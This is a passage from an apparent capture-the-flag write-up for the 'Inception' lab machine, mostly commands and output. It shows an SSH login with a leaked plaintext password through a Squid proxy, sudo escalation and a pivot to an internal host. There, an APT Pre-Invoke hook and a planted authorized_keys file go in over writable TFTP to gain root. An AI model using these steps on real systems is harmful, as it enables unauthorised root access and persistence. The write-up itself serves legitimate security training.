Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:<span class="k">*</span>               LISTEN      -
tcp6       0      0 :::80                   :::<span class="k">*</span>                    LISTEN      -
tcp6       0      0 :::22                   :::<span class="k">*</span>                    LISTEN      -
tcp6       0      0 :::3128                 :::<span class="k">*</span>                    LISTEN      -
udp        0      0 0.0.0.0:38433           0.0.0.0:<span class="k">*</span>                           -
udp6       0      0 :::45319                :::<span class="k">*</span>                                -
</pre></td></tr></tbody></table></code></pre></div></div>
<p>But I see SSH running on the box. 
<code class="language-plaintext highlighter-rouge">cobb:VwPddNh7xMZyDQoByQL4</code> can be valid credentials for SSH, but maybe rules have been added to deny from other hosts.</p>

<p>Let‚Äôs add <code class="language-plaintext highlighter-rouge">http 10.10.10.67 3128</code> to /etc/proxychains as discussed above.
What it does is proxy our http traffic through port 3128 (which is running squid proxy server with http). Which will access SSH and forward our traffic through.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>proxychains ssh cobb@127.0.0.1
ProxyChains-3.1 <span class="o">(</span>http://proxychains.sf.net<span class="o">)</span>
|S-chain|-&lt;<span class="o">&gt;</span><span class="nt">-10</span>.10.10.67:3128-&lt;<span class="o">&gt;</span>&lt;<span class="o">&gt;</span><span class="nt">-127</span>.0.0.1:22-&lt;<span class="o">&gt;</span>&lt;<span class="o">&gt;</span><span class="nt">-OK</span>
The authenticity of host <span class="s1">'127.0.0.1 (127.0.0.1)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>127.0.0.1<span class="s1">' (ECDSA) to the list of known hosts.
cobb@127.0.0.1'</span>s password:
Welcome to Ubuntu 16.04.3 LTS <span class="o">(</span>GNU/Linux 4.4.0-101-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage
Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
cobb@Inception:~<span class="nv">$ </span><span class="nb">ls
</span>user.txt
cobb@Inception:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
4a8bc2d686d093f3f8ad1b37b191303c
cobb@Inception:~<span class="err">$</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="privesc">Privesc</h1>
<p>Checking for sudo permissions:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>cobb@Inception:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>cobb:
Matching Defaults entries <span class="k">for </span>cobb on Inception:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User cobb may run the following commands on Inception:
    <span class="o">(</span>ALL : ALL<span class="o">)</span> ALL
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Getting root:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre>cobb@Inception:~<span class="nv">$ </span><span class="nb">sudo </span>su
root@Inception:/home/cobb# <span class="nb">cd
</span>root@Inception:~# <span class="nb">ls
</span>root.txt
root@Inception:~# <span class="nb">cat </span>root.txt
You<span class="s1">'re waiting for a train. A train that will take you far away. Wake up to find root.txt.
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>If I check for the IP for this box, it‚Äôs <code class="language-plaintext highlighter-rouge">192.168.0.10</code> not the usual 10.10.10.0/24 subnet IP.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>root@Inception:~# ip a
1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    <span class="nb">link</span>/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
4: eth0@if5: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default qlen 1000
    <span class="nb">link</span>/ether 00:16:3e:28:53:63 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.0.10/24 brd 192.168.0.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe28:5363/64 scope <span class="nb">link
       </span>valid_lft forever preferred_lft forever
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Checking for any IP address resolved in ARP tables:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>root@Inception:~# arp <span class="nt">-a</span>
? <span class="o">(</span>192.168.0.1<span class="o">)</span> at fe:8d:c6:c9:e5:81 <span class="o">[</span>ether] on eth0
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Downloading a <code class="language-plaintext highlighter-rouge">nmap</code> binary from <a href="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap">here</a> and running it on 192.168.0.1.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td> --><td class="rouge-code"><pre>root@Inception:/home/cobb<span class="nv">$ </span>./nmap 192.168.0.1 <span class="nt">-n</span> <span class="nt">-v</span>
Starting Nmap 6.49BETA1 <span class="o">(</span> http://nmap.org <span class="o">)</span> at 2021-07-28 20:47 UTC
Not shown: 1202 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
53/tcp open  domain
MAC Address: FE:8D:C6:C9:E5:81 <span class="o">(</span>Unknown<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I can try accessing ftp with anonymous credentials:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
</pre></td> --><td class="rouge-code"><pre>root@Inception:/home/cobb# ftp 192.168.0.1
Connected to 192.168.0.1.
220 <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span>
Name <span class="o">(</span>192.168.0.1:cobb<span class="o">)</span>: anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system <span class="nb">type </span>is UNIX.
Using binary mode to transfer files.
ftp&gt; <span class="nb">cd
</span>Access denied
ftp&gt; <span class="nb">ls
</span>150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Nov 30  2017 bin
drwxr-xr-x    3 0        0            4096 Nov 30  2017 boot
drwxr-xr-x   19 0        0            3920 Jul 27 10:28 dev
drwxr-xr-x   93 0        0            4096 Nov 30  2017 etc
drwxr-xr-x    2 0        0            4096 Nov 06  2017 home
lrwxrwxrwx    1 0        0              33 Nov 30  2017 initrd.img -&gt; boot/initrd.img-4.4.0-101-generic
lrwxrwxrwx    1 0        0              32 Nov 06  2017 initrd.img.old -&gt; boot/initrd.img-4.4.0-98-generic
drwxr-xr-x   22 0        0            4096 Nov 30  2017 lib
drwxr-xr-x    2 0        0            4096 Oct 30  2017 lib64
drwx------    2 0        0           16384 Oct 30  2017 lost+found
drwxr-xr-x    3 0        0            4096 Oct 30  2017 media
drwxr-xr-x    2 0        0            4096 Aug 01  2017 mnt
drwxr-xr-x    2 0        0            4096 Aug 01  2017 opt
dr-xr-xr-x  206 0        0               0 Jul 27 10:27 proc
drwx------    6 0        0            4096 Nov 08  2017 root
drwxr-xr-x   26 0        0             940 Jul 28 06:25 run
drwxr-xr-x    2 0        0           12288 Nov 30  2017 sbin
drwxr-xr-x    2 0        0            4096 Apr 29  2017 snap
drwxr-xr-x    3 0        0            4096 Nov 06  2017 srv
dr-xr-xr-x   13 0        0               0 Jul 27 10:28 sys
drwxrwxrwt   10 0        0            4096 Jul 28 20:50 tmp
drwxr-xr-x   10 0        0            4096 Oct 30  2017 usr
drwxr-xr-x   13 0        0            4096 Oct 30  2017 var
lrwxrwxrwx    1 0        0              30 Nov 30  2017 vmlinuz -&gt; boot/vmlinuz-4.4.0-101-generic
lrwxrwxrwx    1 0        0              29 Nov 06  2017 vmlinuz.old -&gt; boot/vmlinuz-4.4.0-98-generic
226 Directory send OK.
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Checking for any crontabs running on the system:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre>ftp&gt; <span class="nb">cd </span>etc
250 Directory successfully changed.
ftp&gt; get crontab
<span class="nb">local</span>: crontab remote: crontab
200 PORT <span class="nb">command </span>successful. Consider using PASV.
<span class="nb">exit
</span>root@Inception:/home/cobb<span class="nv">$ </span><span class="nb">cat </span>crontab
17 <span class="k">*</span>    <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.hourly
25 6    <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.daily <span class="o">)</span>
47 6    <span class="k">*</span> <span class="k">*</span> 7   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.weekly <span class="o">)</span>
52 6    1 <span class="k">*</span> <span class="k">*</span>   root    <span class="nb">test</span> <span class="nt">-x</span> /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts <span class="nt">--report</span> /etc/cron.monthly <span class="o">)</span>
<span class="k">*</span>/5 <span class="k">*</span>   <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    apt update 2&gt;&amp;1 <span class="o">&gt;</span>/var/log/apt/custom.log
30 23   <span class="k">*</span> <span class="k">*</span> <span class="k">*</span>   root    apt upgrade <span class="nt">-y</span> 2&gt;&amp;1 <span class="o">&gt;</span>/dev/null
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Getting that /var/log/apt/custom.log:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td> --><td class="rouge-code"><pre>Err:1 http://security.ubuntu.com/ubuntu xenial-security InRelease
  Temporary failure resolving <span class="s1">'security.ubuntu.com'</span>
Err:2 http://us.archive.ubuntu.com/ubuntu xenial InRelease
  Temporary failure resolving <span class="s1">'us.archive.ubuntu.com'</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>So, If I update the /etc/hosts file and add security.ubuntu.com as <code class="language-plaintext highlighter-rouge">192.168.0.10</code>, as the crontab runs root will try to update using my host and I can provide a malicious host.
But I don‚Äôt seem to have write perms to hosts file.</p>

<p>I can try changing the config files for apt. They reside in /etc/apt:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td> --><td class="rouge-code"><pre>ftp&gt; <span class="nb">cd </span>etc
250 Directory successfully changed.
ftp&gt; <span class="nb">cd </span>apt
250 Directory successfully changed.
ftp&gt; <span class="nb">ls
</span>200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Nov 30  2017 apt.conf.d
drwxr-xr-x    2 0        0            4096 Apr 14  2016 preferences.d
<span class="nt">-rw-r--r--</span>    1 0        0            3021 Oct 30  2017 sources.list
drwxr-xr-x    2 0        0            4096 Apr 14  2016 sources.list.d
<span class="nt">-rw-r--r--</span>    1 0        0               0 Oct 30  2017 sources.list~
<span class="nt">-rw-r--r--</span>    1 0        0           12255 Aug 01  2017 trusted.gpg
drwxr-xr-x    2 0        0            4096 Apr 14  2016 trusted.gpg.d
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Let‚Äôs see what‚Äôs in /etc/apt/apt.conf.d</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td> --><td class="rouge-code"><pre>ftp&gt; <span class="nb">cd </span>apt.conf.d
250 Directory successfully changed.
ftp&gt; <span class="nb">ls
</span>200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
<span class="nt">-rw-r--r--</span>    1 0        0              82 Oct 30  2017 00CDMountPoint
<span class="nt">-rw-r--r--</span>    1 0        0              49 Oct 30  2017 00aptitude
<span class="nt">-rw-r--r--</span>    1 0        0              40 Oct 30  2017 00trustcdrom
<span class="nt">-rw-r--r--</span>    1 0        0              42 Apr 14  2016 01-vendor-ubuntu
<span class="nt">-rw-r--r--</span>    1 0        0             769 Apr 14  2016 01autoremove
<span class="nt">-r--r--r--</span>    1 0        0            3459 Nov 30  2017 01autoremove-kernels
<span class="nt">-rw-r--r--</span>    1 0        0             129 May 24  2016 10periodic
<span class="nt">-rw-r--r--</span>    1 0        0             108 May 24  2016 15update-stamp
<span class="nt">-rw-r--r--</span>    1 0        0              85 May 24  2016 20archive
<span class="nt">-rw-r--r--</span>    1 0        0            2656 Oct 30  2017 50unattended-upgrades
<span class="nt">-rw-r--r--</span>    1 0        0             182 Nov 10  2015 70debconf
<span class="nt">-rw-r--r--</span>    1 0        0             305 May 24  2016 99update-notifier
ftp&gt; get 00aptitude
<span class="nb">local</span>: 00aptitude remote: 00aptitude
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Let‚Äôs get 00aptitude</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre>root@Inception:/home/cobb# <span class="nb">cat </span>00aptitude
Aptitude::Get-Root-Command <span class="s2">"sudo:/usr/bin/sudo"</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<p>If I modify it and try to upload it‚Äôs still not uploading even though, I have write permissions.
If I check for ftp configurations I get <code class="language-plaintext highlighter-rouge">/etc/default/tftpd-hpa</code>, which says create options are configured for tftp.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td> --><td class="rouge-code"><pre><span class="c"># /etc/default/tftpd-hpa</span>

<span class="nv">TFTP_USERNAME</span><span class="o">=</span><span class="s2">"root"</span>
<span class="nv">TFTP_DIRECTORY</span><span class="o">=</span><span class="s2">"/"</span>
<span class="nv">TFTP_ADDRESS</span><span class="o">=</span><span class="s2">":69"</span>
<span class="nv">TFTP_OPTIONS</span><span class="o">=</span><span class="s2">"--secure --create"</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>and uploading now does work with tftp.</p>

<p>Googling <code class="language-plaintext highlighter-rouge">apt conf execute command</code> gives this <a href="">link</a> at the top.</p>

<p>To get the flag and test for cronjob running, I made a file named test.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>APT::Update::Pre-Invoke <span class="o">{</span><span class="s2">"cp /root/root.txt /tmp/root.txt; chmod 666 /tmp/root.txt"</span><span class="o">}</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Put it to /etc/apt/apt.conf.d using tftp:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>tftp 192.168.0.1
tftp&gt; put <span class="nb">test</span> /etc/apt/apt.conf.d/test
Sent 87 bytes <span class="k">in </span>0.0 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I can also get root shell by putting authorized_keys at .ssh folder as we already saw SSH port is open on 192.168.0.1.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>ssh-keygen
<span class="nv">$ </span><span class="nb">echo</span> <span class="s1">'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};'</span> <span class="o">&gt;</span> caretaker
<span class="nv">$ </span>tftp 192.168.0.1
tftp&gt; put caretaker /etc/apt/apt.conf.d/caretaker
Sent 67 bytes <span class="k">in </span>0.0 seconds
tftp&gt; put .ssh/id_rsa.pub /root/.ssh/authorized_keys
Sent 397 bytes <span class="k">in </span>0.0 seconds
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Then I can just login as root:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td> --><td class="rouge-code"><pre>cobb@Inception:~<span class="nv">$ </span>ssh root@192.168.0.1
The authenticity of host <span class="s1">'192.168.0.1 (192.168.0.1)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:zj8NiAd9po8KKA/z7MGKjn7j6wPFpA2Y6bDTRecUrdE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '</span>192.168.0.1<span class="s1">' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
Last login: Thu Nov 30 20:04:21 2017

root@Inception:~# ifconfig eth0 | grep inet
          inet addr:10.10.10.67  
</span></pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="beyond-root">Beyond root</h1>
<p>I could‚Äôve also revealed all internal ports with squid via the same way I logged into SSH.
Add <code class="language-plaintext highlighter-rouge">http 10.10.10.67 3128</code> to proxy.conf.</p>

<p>Run nmap with proxychains and it‚Äôll give all the internal ports not accessible:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td> --><td class="rouge-code"><pre><span class="nv">$ </span>proxychains nmap <span class="nt">-n</span> <span class="nt">-sCV</span> <span class="nt">-sT</span> 10.10.10.67 <span class="nt">-p-</span> <span class="nt">-v</span> 2&gt;/dev/null
ProxyChains-3.1 <span class="o">(</span>http://proxychains.sf.net<span class="o">)</span>
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 93:ad:d8:31:eb:db:c3:30:8e:96:c4:60:82:8b:4f:c4 <span class="o">(</span>RSA<span class="o">)</span>
|   256 1e:a8:07:32:25:c2:f9:a7:65:98:0e:52:15:3d:96:f7 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 37:1d:45:db:f6:b1:2a:92:50:13:69:de:77:a4:ef:ae <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp   open  http       Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></td></tr></tbody></table></code></pre></div></div>
:ET